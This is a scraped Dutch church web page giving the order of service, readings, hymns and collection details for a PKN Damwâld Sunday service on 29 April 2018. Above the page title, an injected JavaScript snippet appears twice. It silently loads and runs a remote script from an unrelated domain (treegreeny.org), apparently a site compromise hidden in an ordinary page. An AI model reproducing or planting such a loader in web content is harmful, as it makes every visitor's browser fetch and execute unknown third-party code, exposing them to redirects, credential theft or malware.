;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 29 april 2018 11:00 uur - PKN Damwâld
zondag 29 april 2018
11:00 uur

Kerkdienst zondag 29 april 2018 11:00 uur

Informatie

Voorganger:Ds. E. v.d. Veer, Ferwert
Liturgie
Lied voor de dienst : Psalm 93: 1 en 4
Welkom en mededelingen
Aanvangslied : Gezang 21: 1 en 2
Stil gebed, bemoediging en groet
Gebed van inkeer
We zingen: Psalm 32: 2
Tien woorden
We zingen: Psalm 32: 4
We lezen: Matteüs 22: 15-22 en Romeinen 13: 1-7
We zingen: Gezang 318: 1, 2, 7 en 8
Preek
We zingen: Gezang 281
Dankgebed, voorbeden, stil gebed, Onze Vader
Collecte
Slotlied Elb. 362: 1, 2 en 4
Zegen
We zingen: Gezang 411: 1 en 6
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Orhei

Sinds 1995 is de stichting Orhei actief in het Oost Europese land Moldavië. Het land wordt momenteel aangemerkt als het allerarmste land van Europa. De missie van de stichting Orhei is het helpen creëren van het noodzakelijke fundament, een stevige basis, waarmee kansarme minderjarigen en volwassenen in Moldavië zelf in staat worden gesteld haar eigen situatie te verbeteren en daarmee een grondslag te kunnen leggen voor een betere toekomst.

Tweede collecte: Kerk
Uitganscollecte: Kerk